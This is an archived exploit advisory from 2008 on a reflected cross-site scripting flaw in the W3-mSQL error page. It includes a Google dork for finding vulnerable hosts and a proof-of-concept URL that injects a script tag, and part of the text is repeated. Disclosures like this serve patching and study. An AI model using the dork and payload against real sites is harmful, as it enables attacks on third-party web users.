w3msql-xss.txt

w3msql-xss.txt: Posted Jan 3, 2008; Authored by Vivek; W3-mSQL suffers from a cross site scripting vulnerability that leverages a lack of user input sanitization during redisplay on an error page.; tags | exploit, xss; SHA-256 | f1ce04b4a14ef3e040e6b00d2f0d55dc526065378ed7b416d171b68d2fcdb539; Download | Favorite | View

w3msql-xss.txt

A reflected xss flaw exists in the w3-msql error page.

google dork : "W3-mSQL Error!  -  Can't stat script file (/"

Just insert a script from the start of /

like if u get a URL like:- 

http://localhost/cgi-bin/w3-msql/journal/ijcd/index.html

and the error page output as :-

W3-mSQL Error!  -  Can't stat script file (/journal/ijcd/index.html)

u can try this:-

A reflected xss flaw exists in the w3-msql error page.

google dork : "W3-mSQL Error!  -  Can't stat script file (/"

Just insert a script from the start of /

like if u get a URL like:- 

http://localhost/cgi-bin/w3-msql/<script>alert('xss')</script>

to confirm the issue

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 172 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

w3msql-xss.txt

w3msql-xss.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

w3msql-xss.txt

Share This

w3msql-xss.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems